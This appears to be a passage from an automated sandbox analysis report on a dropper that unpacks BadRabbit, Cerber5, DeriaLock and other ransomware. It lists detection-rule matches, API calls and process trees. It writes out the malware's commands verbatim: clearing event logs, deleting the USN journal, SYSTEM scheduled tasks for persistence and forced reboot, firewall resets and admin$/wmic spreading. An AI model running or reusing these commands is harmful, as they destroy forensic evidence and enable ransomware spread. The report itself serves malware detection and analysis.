      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: C:\Users\user\AppData\Local\Temp\Fantom.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\infpub.dat
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B8A23 InitiateSystemShutdownExW,ExitWindowsEx,ExitProcess,3_2_007B8A23
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeFile created: C:\Windows\infpub.dat
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: String function: 0040B654 appears 42 times
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_00406471 NtdllDefWindowProc_W,19_2_00406471
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040B8D1 NtQueryVirtualMemory,19_2_0040B8D1
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_00404DE4 SearchPathW,RtlDosPathNameToNtPathName_U,NtDeleteFile,RtlFreeAnsiString,19_2_00404DE4
      Source: C:\Windows\5753.tmpCode function: 27_2_00007FF7CEF2214C GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,27_2_00007FF7CEF2214C
      Source: C:\Windows\5753.tmpCode function: 27_2_00007FF7CEF21864 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,LocalAlloc,NtQuerySystemInformation,LocalFree,27_2_00007FF7CEF21864
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_00406471 NtdllDefWindowProc_W,40_2_00406471
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040B8D1 NtQueryVirtualMemory,40_2_0040B8D1
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_00404DE4 SearchPathW,RtlDosPathNameToNtPathName_U,NtDeleteFile,RtlFreeAnsiString,40_2_00404DE4
      Source: irH9zMhZub.exe, 00000000.00000000.247141529.00000201CEFF8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamed.exe$ vs irH9zMhZub.exe
      Source: irH9zMhZub.exeBinary or memory string: OriginalFilenamed.exe$ vs irH9zMhZub.exe
      Source: C:\Windows\SysWOW64\wevtutil.exeProcess token adjusted: Security
      Source: irH9zMhZub.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: Fantom.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9916272410358565
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile created: C:\Users\user\Desktop\BadRabbit.zip
      Source: cscc.dat.3.drBinary string: configFlags\Device\dcrypt\DosDevices\dcryptdump_hiber_%s\$dcsys$$dcsys$\Device\CdRom%s\$DC_TRIM_%x$$dcsys$_fail_%xNTFSFATFAT32exFATRSDS
      Source: classification engineClassification label: mal100.rans.spre.troj.expl.evad.winEXE@123/23@2/100
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_007B1368
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,3_2_007B9534
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,3_2_007B9534
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B8313 FindResourceW,LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,memcpy,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,3_2_007B8313
      Source: rundll32.exe, 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.299402588.000000000422D000.00000002.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000002.337976716.000000000420D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
      Source: rundll32.exe, 00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, dispci.exe.3.drBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK
      Source: irH9zMhZub.exeReversingLabs: Detection: 66%
      Source: irH9zMhZub.exeVirustotal: Detection: 63%
      Source: irH9zMhZub.exeMetadefender: Detection: 27%
      Source: C:\Users\user\Desktop\irH9zMhZub.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\irH9zMhZub.exe "C:\Users\user\Desktop\irH9zMhZub.exe"
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\5753.tmp "C:\Windows\5753.tmp" \\.\pipe\{BA7DC5E0-29E5-4FCA-A986-C2C71FD14928}
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
      Source: C:\Windows\5753.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1446829312 && exit
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\5753.tmp "C:\Windows\5753.tmp" \\.\pipe\{BA7DC5E0-29E5-4FCA-A986-C2C71FD14928}
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B7CC5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,3_2_007B7CC5
      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "explorer.exe")
      Source: C:\Users\user\Desktop\irH9zMhZub.exeFile created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040AAFB GetDiskFreeSpaceExW,StrFormatByteSizeW,StrFormatByteSizeW,StrFormatByteSizeW,19_2_0040AAFB
      Source: irH9zMhZub.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      Source: C:\Users\user\Desktop\irH9zMhZub.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B84EE CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,3_2_007B84EE
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_01
